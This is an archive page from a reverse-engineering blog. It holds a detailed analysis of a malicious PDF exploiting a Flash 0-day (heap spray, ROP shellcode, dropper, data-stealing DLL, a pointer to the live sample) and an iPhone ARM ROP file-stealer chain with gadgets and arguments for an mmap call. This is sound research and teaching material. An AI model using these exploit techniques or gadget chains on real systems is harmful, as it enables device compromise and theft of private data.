Archive for the ‘ROP’ Category

Las Vegas & the zynamics team

Wednesday, July 14th, 2010

Along with RECon, the single most important date in the reverse engineering / security research community is the annual Blackhat/DefCon event in Las Vegas. Most of our industry is there in one form or another, and aside from the conference talks, parties and award ceremonies, a good number of technical discussions take place as well (in bars or elsewhere).

This year, a good number of researchers/developers from the zynamics Team will be present in Las Vegas — alphabetically, the list is:

  1. Ero Carrera
  2. Thomas Dullien/Halvar Flake
  3. Vincenzo Iozzo
  4. Tim Kornau

So, if you wish to meet any of the team to discuss reverse engineering, our technologies, our research, or the performance of the Spanish or German football team at the last World Cup, do not hesitate to drop us an email. Vegas is always chaotic, and scheduling a meeting will minimize stress for everyone involved.

The following topics are specifically worth meeting over:

  1. Chat with Ero over our unpacking engine (just presented at RECon) — and how it fits into the larger scheme of things (e.g. VxClass)
  2. Meet with Tim or Vincenzo to discuss automated gadget-finding for ROP, or anything involving the ARM/REIL translations
  3. Meet with Thomas/Halvar to discuss VxClass, automated malware clustering, automated generation of “smart” malware signatures etc.

Aside from this, if you are interested in …

  • … boosting your reverse engineering performance by porting symbols from FOSS software into your closed-source disassemblies (BinDiff)
  • … becoming faster at finding bugs by leveraging differential debugging, the REIL intermediate language and static analysis frameworks (BinNavi)
  • … enhancing team-based reverse engineering by pooling accumulated knowledge and sharing information (BinCrowd)
  • … automatically correlating and clustering malware and forensically obtained memory dumps, and automatically deriving detection mechanisms (VxClass)
  • … analyzing malicious PDF files including the embedded JavaScript code (PDF Dissector)

then do not hesitate to drop us mail — we’ll gladly show/explain what our tools/technologies can do.

See you there!

A brief analysis of a malicious PDF file which exploits this week's Flash 0-day

Wednesday, June 9th, 2010

I spent the last two days with a friend of mine, Frank Boldewin, analyzing the Adobe Reader/Flash 0-day that’s being exploited in the wild this week. We had received a sample of a malicious PDF file which exploits the still unpatched vulnerability (MD5: 721601bdbec57cb103a9717eeef0bfca) and it turned out more interesting than we had expected. Here is what we found:

Part I: The PDF file

The PDF file itself is rather large. Analyzing the file with PDF Dissector, I found two interesting streams inside the PDF file. There is actually a third interesting stream, belonging to object 17, which I will describe later. It contains an encrypted EXE file which is dropped and executed by the shellcode, but this cannot be known before analyzing the shellcode.

The first interesting stream can be found in PDF object 1. It is a binary stream that starts with the three characters CWS, the magic value of compressed Flash SWF file headers. I dumped this stream to a file and it turned out to be a valid Flash file.
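As a rough illustration of that check, here is a minimal Python sketch that recognizes the CWS magic and inflates the stream. It relies on the documented SWF header layout (3-byte signature, 1-byte version, 4-byte little-endian uncompressed length, then zlib data); the function name `inflate_swf` is made up for this example and is not part of PDF Dissector.

```python
import struct
import zlib


def inflate_swf(stream: bytes) -> bytes:
    """Return an uncompressed (FWS) SWF for a raw stream dumped from a PDF object."""
    signature = stream[:3]
    if signature == b"FWS":  # already uncompressed, nothing to do
        return stream
    if signature != b"CWS":
        raise ValueError("stream does not start with a SWF signature")
    version = stream[3]
    # Bytes 4..7 hold the length of the *uncompressed* file, little-endian.
    (declared_len,) = struct.unpack_from("<I", stream, 4)
    body = zlib.decompress(stream[8:])
    # Rebuild the header with the FWS signature; version and length are copied as-is.
    return b"FWS" + bytes([version]) + struct.pack("<I", declared_len) + body
```

Comparing `len(result)` with the declared length in the header is a cheap sanity check before feeding the file to a Flash disassembler.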

The second interesting stream belongs to PDF object 10. This stream contains a very short JavaScript code snippet that heap-sprays a huge array onto the heap. In the screenshot below you can see the original code.

I then used PDF Dissector to execute the JavaScript code. The byte array that gets heap-sprayed is stored in the variable _3 after execution. I dumped this byte array to a file (see heapspray.bin in the ZIP file at the end of this post) and disassembled it with IDA Pro.

Later it will become clear that the embedded SWF file is actually exploiting the Flash player and not Adobe Reader (or rather it exploits the Flash player DLL that is shipped with Adobe Reader). The purpose of the PDF file is primarily to massage the heap into a predictable state for the Flash player exploit.

Part II: The shellcode – Stage I

In the disassembled file I expected to see a nop-sled followed by regular x86 code but this is not what I found. There is something that looks like a huge nop-sled (a long list of ‘or al, 0Ch’ instructions) but no valid code follows that nop-sled (which will later turn out not to be a nop-sled at all). Rather, following the ‘nop-sled’ I found a list of addresses that point into code of an Adobe Reader DLL called BIB.DLL. We were dealing with return-oriented shellcode here.

You can find the documented IDB of the shellcode in the ZIP file at the end of this post. For now please click on this link for a text file that contains the documented code. The beginning looks like

seg000:00000BEC     dd 7004919h             ; pop ecx
seg000:00000BEC                             ; pop ecx
seg000:00000BEC                             ; mov dword ptr [eax+0Ch], 1
seg000:00000BEC                             ; pop esi
seg000:00000BEC                             ; pop ebx
seg000:00000BEC                             ; retn
seg000:00000BF0     dd 0CCCCCCCCh           ; ecx = 0xCCCCCCCC
seg000:00000BF4     dd 70048EFh             ; ecx = 0x070048EF
seg000:00000BF8     dd 700156Fh             ; esi = 0x0700156F
seg000:00000BFC     dd 0CCCCCCCCh           ; ebx = 0xCCCCCCCC
seg000:00000C00     dd 7009084h             ; retn
seg000:00000C04     dd 7009084h             ; retn

and continues for quite a while. The first column shows the address. The second column shows the values on the stack (primarily addresses to ROP gadgets in BIB.DLL). The third column shows what instructions can be found at the given addresses in BIB.DLL and what effects the shellcode has.
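To make the relation between the first two columns concrete, the following Python sketch packs the seven stack values from the excerpt above into little-endian DWORDs and reads them back with their offsets. The helper names are invented for illustration; only the values and the 0xBEC start offset come from the listing.

```python
import struct

# Values copied from the listing: the first gadget address, the data its
# pop instructions consume, then two plain "retn" gadgets.
ROP_STACK = [
    0x07004919, 0xCCCCCCCC, 0x070048EF, 0x0700156F, 0xCCCCCCCC,
    0x07009084, 0x07009084,
]


def pack_stack(values):
    """Lay the values out in memory as consecutive little-endian DWORDs."""
    return struct.pack("<%dI" % len(values), *values)


def unpack_stack(raw, base=0x0BEC):
    """Yield (offset, dword) pairs, similar to the 'dd' lines in the IDB."""
    for i in range(0, len(raw) - len(raw) % 4, 4):
        yield base + i, struct.unpack_from("<I", raw, i)[0]


for offset, value in unpack_stack(pack_stack(ROP_STACK)):
    print("seg000:%08X     dd %08Xh" % (offset, value))
```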

The ROP shellcode is a variant of the code found in this exploit POC by villy. At first, the shellcode allocates memory using NtAllocateVirtualMemory (accessed through sysenter). Then, it copies a second stage shellcode to the allocated memory and executes it.

BIB.DLL is actually a DLL file that gets randomly relocated if you have address-space layout randomization enabled on your system. Systems with ASLR enabled cannot be exploited by this malicious PDF file. This does not mean that the vulnerability cannot be exploited if ASLR is enabled; it’s just that the particular sample we looked at will not work in that case.

Part III: The shellcode – Stage II

The second stage shellcode is rather short. All it does is copy the third stage shellcode to the memory allocated by the first stage. Afterwards the third stage is executed. An IDB file for the second stage is included in the ZIP file at the end of this post.

[code]seg000:00000000  pop     edx
seg000:00000001  nop
seg000:00000002  push    esp
seg000:00000003  nop
seg000:00000004  pop     edx
seg000:00000005  jmp     short loc_1C
seg000:00000007 loc_7:
seg000:00000007  pop     eax
seg000:00000008 ; In this loop of the second stage of the shellcode, the third stage
seg000:00000008 ; of the shellcode is copied to a known address (memory allocated by
seg000:00000008 ; the first ROP stage) and executed afterwards.
seg000:00000008 CopyLoop:
seg000:00000008  mov     ebx, [edx]
seg000:0000000A  mov     [eax], ebx
seg000:0000000C  add     eax, 4
seg000:0000000F  add     edx, 4
seg000:00000012  cmp     ebx, 0C0C0C0Ch  ; Search for this signature to stop copying.
seg000:00000018  jnz     short CopyLoop
seg000:0000001A  jmp     short CopyTarget
seg000:0000001C loc_1C:
seg000:0000001C  call    loc_7
seg000:00000021 ; After the copy loop is complete, the third stage of the shellcode begins here.
seg000:00000021 CopyTarget:
seg000:00000021  nop[/code]
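The copy loop can be modelled in a few lines of Python. This is only a sketch of the loop's logic over a byte string, with an invented function name; note that the signature DWORD itself is copied as well, because the comparison happens after the store.

```python
import struct

SIGNATURE = 0x0C0C0C0C


def copy_until_signature(src: bytes, src_off: int = 0) -> bytes:
    """Copy DWORDs from src until the signature DWORD has been copied."""
    out = bytearray()
    while True:
        (dword,) = struct.unpack_from("<I", src, src_off)  # mov ebx, [edx]
        out += struct.pack("<I", dword)                     # mov [eax], ebx
        src_off += 4                                        # add eax, 4 / add edx, 4
        if dword == SIGNATURE:                              # cmp ebx, 0C0C0C0Ch
            return bytes(out)                               # jmp short CopyTarget
```

If the signature never appears, `struct.unpack_from` raises an error at the end of the buffer; the real shellcode has no such safety net and would simply keep copying.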

Part IV: The shellcode – Stage III

The third stage is larger again. First, it resolves a bunch of Windows API functions through name hashes. Then, it tries to figure out which open file handle points to the malicious PDF file itself. This is done by estimating the file size of the malicious PDF file and by scanning potential candidate files for two characteristic signatures. If the malicious PDF file is found, a section of the PDF file (the third interesting stream I mentioned above) is decrypted using a simple XOR decryption and then written to the file C:\-.exe. This file is then executed.

Since the third stage is part of the heap-sprayed data you can actually find the third stage code in the IDB file of the ROP stage.  The third stage code begins right after the ROP stage ends. If you want to check out the code of the third stage right now, please click on this link to see the text dump.

Part V: The dropped file -.exe

Inside the ZIP package at the end of this post you can find the commented IDB file of -.exe. Once again, this file is rather simple. Here is what it does:

  • It checks whether the current user is an administrator account.
  • If it’s not, download and execute it. Then shut down -.exe.
  • If it is, it extracts a file called C:\windows\EventSystem.dll and a file called C:\windows\system32\es.ini from its own resource section.
  • The BITS service (Background Intelligent Transfer Service) is shut down.
  • Windows file protection is disabled.
  • The original qmgr.dll file is moved to kernel64.dll
  • EventSystem.dll replaces the original C:\windows\system32\qmgr.dll, C:\windows\system32\dllcache\qmgr.dll and c:\windows\servicepackfiles\i386\qmgr.dll
  • qmgr.dll, EventSystem.dll, and es.ini get the timestamp of the original qmgr.dll
  • The BITS service is started again, now with the dropped qmgr.dll instead of the original qmgr.dll

If you want to check out the code right now, you can click on this link to see the disassembled file.

Part VI: The dropped file EventSystem.dll

The primary purpose of EventSystem.dll, the DLL file that was registered as a service by -.exe, is to collect information about the user’s system and to send it to a server controlled by the attacker. You can see a dump of what information is collected and sent in this log file.

Additionally, the EventSystem.dll file also contains code that can download new files from the internet and execute them afterwards. You can check out the IDB file in the ZIP file at the end of this post for a complete disassembly.

Part VII: Finding the vulnerability in the Flash player

The description of the shellcode is now complete, but one question remains: What is actually the vulnerability in the Flash player? Here is what we found:

The first step was to figure out when control flow is transferred from regular Flash player code to the first stage of the shellcode. At zynamics we have a Pin tool plugin we use to automatically recognize  shellcode and dump it to a file. You can find the complete trace generated by the Pin tool plugin in the ZIP file (pin_trace.txt). Here is the important part:

[code]0x0700156F::BIB.dll  8B 41 34                mov eax, dword ptr [ecx+0x34]
0x07001572::BIB.dll  FF 71 24                push dword ptr [ecx+0x24]
0x07001575::BIB.dll  FF 50 08                call dword ptr [eax+0x8]
0x070048EF::BIB.dll  94                      xchg esp, eax
0x070048F0::BIB.dll  C3                      ret
0x07004919::BIB.dll  59                      pop ecx
0x0700491A::BIB.dll  59                      pop ecx
0x0700491B::BIB.dll  C7 40 0C 01 00 00 00    mov dword ptr [eax+0xc], 0x1[/code]

At address 0x07004919 of BIB.dll, the ROP code of the first stage is executed. Two instructions before, at address 0x070048EF, the original stack of the executing thread is replaced by something controlled by the attacker.

To figure out where control flow is coming from it is possible to set a breakpoint on the XCHG instruction and take a look at the stack. The return value of the active stack frame will point to memory on the heap where you can find code. This code does not belong to any code section of any module, so where does it come from? Turns out that this code is just-in-time compiled ActionScript code that is created from the malicious SWF file inside the malicious PDF file.

To analyze exactly how control flow is transferred from the JIT-ed ActionScript code to the ROP stage of the shellcode, I have created a trace with OllyDbg that shows all instructions that are executed after the just-in-time compilation of the ActionScript code but before the ROP code. You can find the trace in the ZIP file at the end of this post (olly_trace.txt). Here are the important parts:

[code]28CDE2A0  mov eax,dword ptr ss:[ebp-44]

28CDE2C0  mov edx,dword ptr ds:[eax+10]     EAX=25966241

28CDE2C6  mov ecx,dword ptr ds:[edx+2b8]    EAX=25966241, EDX=20259384

28CDE2D5  mov dword ptr ss:[ebp-60],ecx     EAX=25966241, ECX=0C0C0C0C, EDX=00259685

28CDE2EF  mov ecx,dword ptr ss:[ebp-60]     EAX=25966241, ECX=0012F5D0, EDX=00259685

28CDE2F8  call dword ptr ds:[ecx+0c]        EAX=25966241, ECX=0C0C0C0C, EDX=00259685[/code]

The call at 28CDE2F8 goes directly to 0x0700156F in BIB.dll (see the Pin tool trace). So what is going on here? To understand these six lines of code you have to know a bit about the memory layout at address 0x25966241 (the value in EAX) and about the internals of just-in-time compiled ActionScript code.

Let’s start with the memory layout. Here is what I saw at 0x25966241 (note that the dump starts at 0x25966240).

[code]0x25966240   C8 0E 3D 30  05 00 00 20  00 00 00 00 00 00 00 00
0x25966250   78 84 93 25  20 44 90 25[/code]

Now eax (0x25966241) is used as a pointer in instruction 0x28CDE2C0. You might already notice that the pointer is not aligned at all. This is unusual. Now comes the part where you need to know about compiled ActionScript internals.

When values like integer numbers or objects are created by ActionScript scripts, pointers to these objects are created and stored. Interestingly, all ActionScript values must be 8-byte aligned because the lowest three bits of pointers to such values are used to encode type information about the values. For example, if the lowest three bits of such a pointer are 101, then the pointed-to value is a boolean value. 111 identifies a double value and so on.

So apparently what is happening in the above code is that a pointer that includes type information is used as a regular pointer without stripping the type information first. If you debug this piece of code and manually clear the lowest three bits to remove the type information, the value 25966241 turns into 25966240 (which itself contains a pointer to a v-table of a class called ScriptObject, lending more credence to the theory I am exploring here). So, when [eax+10] is read without stripping the type information, the pointer 0x20259384 is read. This pointer points to the binary data that was heap-sprayed by the JavaScript code of the PDF file. If you do strip the type information though, you get the pointer 0x25938478 which is a legitimate pointer to another part of the just-in-time compiled ActionScript code.
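The two reads can be reproduced directly from the memory dump shown earlier. The Python sketch below uses only the 24 dumped bytes; the helper names and the 3-bit mask constant are illustrative.

```python
import struct

DUMP_BASE = 0x25966240
DUMP = bytes.fromhex(
    "C80E3D30" "05000020" "00000000" "00000000"  # 0x25966240
    "78849325" "20449025"                          # 0x25966250
)
TAG_MASK = 0x7  # the lowest three bits carry the type information


def read_dword(addr: int) -> int:
    """Read a little-endian DWORD from the dumped memory region."""
    return struct.unpack_from("<I", DUMP, addr - DUMP_BASE)[0]


def strip_tag(pointer: int) -> int:
    """Clear the type bits to obtain the real, 8-byte aligned pointer."""
    return pointer & ~TAG_MASK


eax = 0x25966241
print(hex(read_dword(eax + 0x10)))             # what the JIT-ed code reads
print(hex(read_dword(strip_tag(eax) + 0x10)))  # what it should have read
```

The off-by-one read straddles two fields of the object, which is how a legitimate pointer (0x25938478) becomes an address inside the heap spray (0x20259384).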

After instruction 28CDE2C0 the register EDX points to the heap-sprayed values. Most of the heap-sprayed values are 0x0C0C0C0C DWORD values, so edx+2b8 most likely points to such a DWORD value and 0x0C0C0C0C is moved into register ECX. Through some clever heap-spraying, one iteration of the heap-sprayed data actually starts at address 0x0C0C0C0C so the memory layout starting from 0x0C0C0C0C is controlled by the attacker. He then controls the value of [ecx+0c], the address of the function to be executed next.

If you go back to the JavaScript code in the malicious PDF file now, you can see the value 156f0700 close to the beginning of the heap-sprayed string. This is just the value 0x0700156F which is the entry point to the attacker-controlled control-flow in BIB.dll (see the Pin trace above again).
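The byte order can be checked quickly in Python. This sketch assumes the sprayed string is built from 16-bit units in the usual `%uXXXX` style (an assumption; the text above only states that the value 156f0700 is visible), each stored little-endian in memory.

```python
import struct


def units_to_bytes(units):
    """Lay out 16-bit code units the way a UTF-16LE string stores them."""
    return struct.pack("<%dH" % len(units), *units)


raw = units_to_bytes([0x156F, 0x0700])
(entry,) = struct.unpack("<I", raw)
print(raw.hex(), hex(entry))
```

Read as a single little-endian DWORD, the two units 156f and 0700 give the BIB.dll address 0x0700156F.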

We know now how control flow is transferred from the just-in-time compiled code to the shellcode. The question that remains is why does the JIT-compiler produce code that leads to incorrect pointer usage?

There are two possible options here. The first one is that the JIT-compiler has a bug and emits wrong x86 code, code that forgets to strip off the type information. I don’t think this is the case because the emitted code that leads to the control-flow hijack is generated in benign cases too. I think it is far more likely that the compiler assumes pre-conditions about the generated code that are not true in this particular situation. In all of the benign cases I have observed, the type information was stripped from the pointer before the JIT code was even executed. In the malicious case this does not happen which leads me to believe that the compiler emits code that assumes that all input pointers to that code segment have been stripped of their type information but apparently this is not always the case.

Let’s look at what could trip up the JIT compiler.

Part VIII: The malformed Flash file

Using the SWFTools disassembler we had a look at the Flash file that was embedded in the PDF file. It quickly turned out (by looking at characteristic strings) that the Flash file is a modified version of AES-PHP.swf. Disassembling the original SWF file and the malicious SWF file and comparing the two revealed just a single difference.

[code]00206) + 0:1 getlex <q>[protected]fl.controls:LabelButton::icon</q>
00207) + 1:1 getlex <q>[public]::Math</q>
00208) + 2:1 getlocal_2
00209) + 3:1 getlex <q>[public]fl.controls::ButtonLabelPlacement</q>
00210) + 4:1 getproperty <q>[public]::BOTTOM</q>
00211) + 4:1 ifne ->218[/code]

[code]00206) + 0:1 getlex <q>[protected]fl.controls:LabelButton::icon</q>
00207) + 1:1 getlex <q>[public]::Math</q>
00208) + 2:1 getlocal_2
00209) + 3:1 getlex <q>[public]fl.controls::ButtonLabelPlacement</q>
00210) + 4:1 newfunction [method 000001ba ]
00211) + 5:1 ifne ->218[/code]

The only difference can be found in line 210. While the benign Flash file tries to access the property BOTTOM, the malicious Flash file tries to create a new function object. This simple change messes up the internal ActionScript stack (as can be seen in the differing stack depth numbers after the +) because getproperty and newfunction have different effects on the ActionScript stack. Subsequent ActionScript instructions then assume a stack layout which is simply wrong. Nevertheless, the JIT compiler seems to accept this code and generates x86 code for it. The consequence of this change seems to be that preconditions for JIT-compiled code that were previously true do not hold anymore and the attacker can control the control flow as seen above.
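The differing depth numbers in the two listings can be reproduced with a small stack-depth model. The net stack effects below are those documented for these AVM2 opcodes when used with compile-time names, as in the listings; the table and function names are made up for this sketch.

```python
# Net operand-stack effect of each opcode (values pushed minus values popped).
STACK_EFFECT = {
    "getlex": +1,
    "getlocal_2": +1,
    "getproperty": 0,   # pops the object, pushes the property value
    "newfunction": +1,  # pushes a new function object, pops nothing
    "ifne": -2,         # pops the two values it compares
}


def depths(opcodes):
    """Return the stack depth before each opcode, followed by the final depth."""
    depth, result = 0, []
    for op in opcodes:
        result.append(depth)
        depth += STACK_EFFECT[op]
    result.append(depth)
    return result


COMMON = ["getlex", "getlex", "getlocal_2", "getlex"]
benign = depths(COMMON + ["getproperty", "ifne"])
malicious = depths(COMMON + ["newfunction", "ifne"])
print(benign, malicious)
```

In this model the malicious sequence leaves one more value on the stack after `ifne` than the benign one, so every later instruction operates one slot off from what the original code expected.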

Part IX: The end

Now it would be interesting to figure out exactly what trips up the JIT code generation to see how it gets into this situation. I think we are going to wait for the patch for this and just use BinDiff to compare the patched version of the Flash player with the unpatched version. 🙂

You can get the malicious PDF file and all the IDB files and traces we generated from this ZIP file. We have also submitted -.exe to CWSandbox. You can see the generated report about the file’s activity here.

Oh yeah, the malicious PDF file is in the ZIP package too. Pay some attention there and don’t backdoor yourself accidentally. The password to the ZIP file is ‘infected’.

ROP and iPhone

Friday, April 16th, 2010

As you might know, Ralf-Philipp Weinmann from the University of Luxembourg and I won pwn2own by owning the iPhone.

Smartphones are different beasts compared to desktops when it comes to exploitation. Specifically, the iPhone has a fairly important exploit mitigation measure, code signing, which makes both exploitation and debugging quite annoying and definitely raises the bar when it comes to writing payloads.

What smartphones usually miss, and that is the case for iPhone as well, is ASLR. Add up the two and we have the perfect OS on which to use ROP payloads.

We are not authorized to talk about the exploit itself as it is being sold to ZDI. Nonetheless, we want to give a brief explanation of the payload because, to the best of our knowledge, it is the first practical example of a weaponized payload on ARMv7 and iPhone 3GS.

In order to decide what kind of payloads we want to write, another security countermeasure has to be taken into account, namely Sandboxing.

On iPhone most applications are sandboxed with different levels of restrictions. The sandboxing is done in a kernel extension using the MAC framework. A few well-known syscalls are usually denied (execve() to name one) and normally access to important files is restricted. One last important thing to notice is that the iPhone doesn’t have a shell, so that is not an option for our payload.

Luckily we are able to read files like the SMS database, the address book database and a few others containing sensitive information (this depends on the specific sandbox profile of the application).

A few notions are needed to be able to write ARM payloads; a lot of good information on the topic can be found here. I will nonetheless outline the basics needed below.

The first thing one has to understand before writing a ROP payload is the calling convention used in iPhoneOS.

For iPhone the first four arguments are passed using the r0-r3 registers. If other arguments are needed, those are pushed onto the stack. Functions usually return to the address held in the LR register, so when we write our payload we need to make sure that we control LR.

Another important difference between ARM ROP payloads and x86 ROP payloads is instruction size.

In ARM there are only two possible sizes for instructions: 4 bytes (ARM mode) or 2 bytes (THUMB mode). To reach THUMB instructions one has to branch, using an interworking instruction such as bx, to an address whose least significant bit is set (and which is therefore not 4-byte aligned); this causes the processor to switch to THUMB mode. More formally, the processor executes THUMB instructions when the T bit in the CPSR is 1 and the J bit is 0.
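In practice this means that every THUMB gadget address placed on a crafted stack has its lowest bit set, which is why the gadget addresses in the mmap() example further down are odd (0x32988d5f for the gadget located at 0x32988d5e). A tiny Python sketch of that convention, with invented helper names:

```python
def thumb_target(gadget_address: int) -> int:
    """Value to place on the stack so that the branch lands in THUMB mode."""
    return gadget_address | 1


def decode_target(value: int):
    """Split a branch target into (instruction address, is_thumb)."""
    return value & ~1, bool(value & 1)


print(hex(thumb_target(0x32988D5E)))
print(decode_target(0x32988D5F))
```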

ARMv7 also supports a “hybrid” mode, THUMB2 (first introduced with ARMv6T2). This mode supports both 32-bit and 16-bit instructions (the switch between 32 bits and 16 bits is done following the same criteria explained before for THUMB).

One last thing to note is that functions are usually called through b/bl/blx instructions, but when writing our payload we are almost always forced not to use bl and blx. Those two instructions save the address of the next instruction in the lr register, so we would lose control over the program flow.

I won’t describe the concepts behind ROP in detail as there is plenty of literature available. Tim is writing about ROP on ARM in our blog as well.

I will instead try to outline what important steps are needed when it comes to writing an ARM ROP payload on the iPhone.

In our exploit we know that some data we control lies in r0. The first thing we want to achieve is to control the stack pointer. So we have to find a sequence that allows us to switch the stack pointer with a memory region we control. We do this in two stages:

6a07 ldr r7, [r0, #32]
f8d0d028 ldr.w sp, [r0, #40]
6a40 ldr r0, [r0, #36]
4700 bx r0

// r0 is a pointer to the crafted data structure used in the exploit. We point r7 to our crafted stack, and r0 to the address of the next ROP gadget.
// The stack pointer points to something we don’t control as the node is 40 bytes long. So we just jump to another code snippet which will put us in control of SP.

f1a70d00 sub.w sp, r7, #0 ;0x0
bd80 pop {r7, pc}
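The effect of the two gadgets can be followed with a toy model. The Python sketch below emulates them over a flat byte string in which offsets stand in for addresses; the 40-byte node size and the offsets 32, 36 and 40 come from the gadgets and comments above, everything else (names, test values) is hypothetical.

```python
import struct

NODE_SIZE = 40


def build_node(crafted_stack: int, second_gadget: int) -> bytes:
    """Crafted 40-byte node: only the fields the first gadget reads are filled in."""
    node = bytearray(NODE_SIZE)
    struct.pack_into("<I", node, 32, crafted_stack)  # ldr r7, [r0, #32]
    struct.pack_into("<I", node, 36, second_gadget)  # ldr r0, [r0, #36]
    return bytes(node)


def pivot(memory: bytes, node_off: int) -> dict:
    """Emulate both gadgets and return the resulting register state."""
    def load(off):
        return struct.unpack_from("<I", memory, off)[0]

    r7 = load(node_off + 32)
    sp = load(node_off + 40)         # lies past the node: not attacker-controlled
    r0 = load(node_off + 36)         # bx r0 continues at the second gadget
    sp = r7                          # sub.w sp, r7, #0
    r7, pc = load(sp), load(sp + 4)  # pop {r7, pc}
    return {"sp": sp + 8, "r7": r7, "pc": pc, "second_gadget": r0}
```

After the second gadget, both sp and pc come from attacker-supplied data, which is the starting point for the rest of the payload.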

Now that we control the stack pointer we can take a closer look at our payload.

A file stealer payload should in principle do the following:

  1. Open a file
  2. Open a socket
  3. Connect to the socket
  4. Get the file size (using for instance fstat())
  5. Read the content of the file (in our case by mmaping it into memory)
  6. Write the content of the file to the remote server
  7. Close the connection
  8. Exit the process/continue execution

This is quite a long list for a ROP shellcode, so we are not going to discuss each and every step but just highlight some that are very important.
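For orientation, here is what the same eight steps look like as ordinary code rather than as a ROP chain. This is a plain Python sketch for a Unix-like system, not the payload itself; the function names, host and port parameters are placeholders.

```python
import mmap
import os
import socket


def send_mapped_file(fd: int, sock: socket.socket) -> int:
    """Steps 4-6: get the size, map the file read-only, write it to the socket."""
    size = os.fstat(fd).st_size                                   # 4. file size
    with mmap.mmap(fd, size, flags=mmap.MAP_PRIVATE,
                   prot=mmap.PROT_READ) as view:                  # 5. mmap the file
        sock.sendall(view)                                        # 6. send content
    return size


def send_file(path: str, host: str, port: int) -> int:
    fd = os.open(path, os.O_RDONLY)                               # 1. open the file
    try:
        with socket.create_connection((host, port)) as sock:     # 2 + 3. socket, connect
            return send_mapped_file(fd, sock)
        # 7. leaving the with-block closes the connection
    finally:
        os.close(fd)                                              # 8. clean up, continue
```

Each of these one-line library calls has to be expressed as a sequence of gadgets and stack values in the real payload, which is why the list is long by ROP standards.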

The first thing our payload needs to do is to control the content of the lr register. A gadget that allows us to do so is:

e8bd4080 pop {r7, lr}
b001 add sp, #4
4770 bx lr

Next we will see an example of how a function can be called using ROP on ARM. We take as an example mmap() because it has more than 4 arguments therefore it is a bit trickier:

ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
ropvalues[i++] = 0x00000000; //r5 whatever
ropvalues[i++] = 0x00000000; //r8 is gonna be the file len for mmap
ropvalues[i++] = 0x00000002; //r9 MAP_PRIVATE copied in r3
ropvalues[i++] = 0x32988d5f; // PC
//32988d5e bd0f pop {r0, r1, r2, r3, pc}

ropvalues[i++] = locFD - 36; // r0 contains the memory location where the FD is stored
ropvalues[i++] = locStat +60; // r1 struct stat file size member
ropvalues[i++] = 0x00000001; // r2 PROT_READ
ropvalues[i++] = 0x00000000; // r3 is later used to store the FD in the following gadget
ropvalues[i++] = 0x32979837;
//32979836 6a43 ldr r3, [r0, #36]
//32979838 6a00 ldr r0, [r0, #32]
//3297983a 4418 add r0, r3
//3297983c bd80 pop {r7, pc}
ropvalues[i++] = sp + 73*4 + 0x10;
ropvalues[i++] = 0x32988673;
//32988672 bd01 pop {r0, pc}
ropvalues[i++] = sp -28; //r0 has to be a valid piece of memory we don’t care about(we just care for r1 here)
ropvalues[i++] = 0x329253eb;
//329253ea 6809 ldr r1, [r1, #0]
//329253ec 61c1 str r1, [r0, #28]
//329253ee 2000 movs r0, #0 //this will reset to 0 r0 (corresponding to the first argument of mmap())
//329253f0 bd80 pop {r7, pc}
ropvalues[i++] = sp + 75*4 + 0xc; //we do this because later SP will depend on it
ropvalues[i++] = 0x328C5CBd;
//328C5CBC STR R3, [SP,#0x24+var_24]
//328C5CBE MOV R3, R9 //r9 was filled before with MAP_PRIVATE flag for mmap()
//328C5CC0 STR R4, [SP,#0x24+var_20]
//328C5CC2 STR R5, [SP,#0x24+var_1C]
//328C5CC4 BLX ___mmap
//328C5CC8 loc_328C5CC8 ; CODE XREF: _mmap+50
//328C5CC8 SUB.W SP, R7, #0x10
//328C5CCC LDR.W R8, [SP+0x24+var_24],#4
//328C5CD0 POP {R4-R7,PC}

ropvalues[i++] = 0xbbccddee;//we don’t care for r4-r7 registers
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x00000000;
ropvalues[i++] = 0x32987baf;
//32987bae bd02 pop {r1, pc}

This payload snippet roughly translates to:

[sourcecode language="cpp"]
mmap(0x0, statstruct.st_size, PROT_READ, MAP_PRIVATE, smsdbFD, 0x0);
[/sourcecode]

What we had to do here is to store the arguments both inside the registers (the easy part) and to push two of them onto the stack.

Pushing arguments on the stack creates an extra problem when writing a ROP payload because we have to make sure our payload is aligned with the stack pointer. This is why we have to craft r7 in a specific way in line 26 of the listing above (the sp + 75*4 + 0xc value).

Finally we pop the program counter and jump to some other instructions in memory.

Having seen this payload one may wonder how to find the proper gadgets in the address space of a process.

As said before iPhone doesn’t have ASLR enforced which means that every library mapped in the address space is a possible source of gadgets.

There are some automated tools to find those gadgets and compile them to form a ROP shellcode on x86. Unfortunately that is not the case for ARM. Our co-worker Tim maintains and develops a great tool, written for his thesis, that can ease the process of finding gadgets on ARM, and he is currently working on extending the tool to compile (or better, combine) gadgets to form valid shellcode.

As far as we know no techniques to disable code signing “on the fly” have been found on the latest firmware of iPhone.

It is therefore important for anyone trying to exploit an iPhone vulnerability to learn ROP programming.

One last thing has to be said: the iPhone security model is pretty robust as it is now.

If it ever supports ASLR, attacking it will be significantly harder than attacking any desktop OS. In fact, most applications are sandboxed, which greatly limits their ability to do harm, and code signing is always in place. ASLR will limit the ability to create ROP payloads, and there is neither Flash nor a JIT compiler to play with on the iPhone ;)

Finally if you are interested in iPhone hacking you should attend the class that I am going to give together with Dino Dai Zovi at Black Hat USA. It will be on Mac OS X hacking but most of the teaching material can be used on iPhone as well!


Algorithms for platform independent return-oriented programming (I of III)

Friday, April 16th, 2010

In my last post about the history of return-oriented programming I showed that we are not dealing with a completely new technology when we talk about return-oriented programming. However, the technology is evolving to a point where even the world of academia thinks it worth discussing at theoretical conferences. Until recently return-oriented programming has always been platform dependent, so that one specific implementation was only able to work on one single platform. To sharpen the point a little further, current approaches generally target only one specific compiler for one platform. Even though this is not necessarily the case for variable-length instruction sets like the IA-32/64 instruction set, where the search for instruction sequences can be performed without paying attention to alignment restrictions, for all platforms where alignment is enforced the current approaches are still very limited.

In this post I will start showing a set of algorithms which can be used platform independently to locate suitable instruction sequences for return-oriented programming.

So let’s get started with defining return-oriented programming to get an idea of where we are eventually trying to end up.

The goal is to build a program from existing code chunks of another program or commonly used libraries. A program built from the parts of another binary is called a return-oriented program. The individual parts that form a return-oriented program are named gadgets. A gadget is a sequence of instructions in the target binary that provides a usable operation, such as addition of two registers. To be able to build a program from gadgets, they must be combinable. Gadgets are combinable if they end in an instruction that changes control flow in a way that can be controlled by the attacker. Instructions at the end of gadgets are named free-branch instructions. A free-branch instruction must satisfy the following properties:

  • The control flow must change at this instruction.
  • The target of the control flow must be controllable (free) such that the input from an attacker-controlled register or memory offset defines the target.

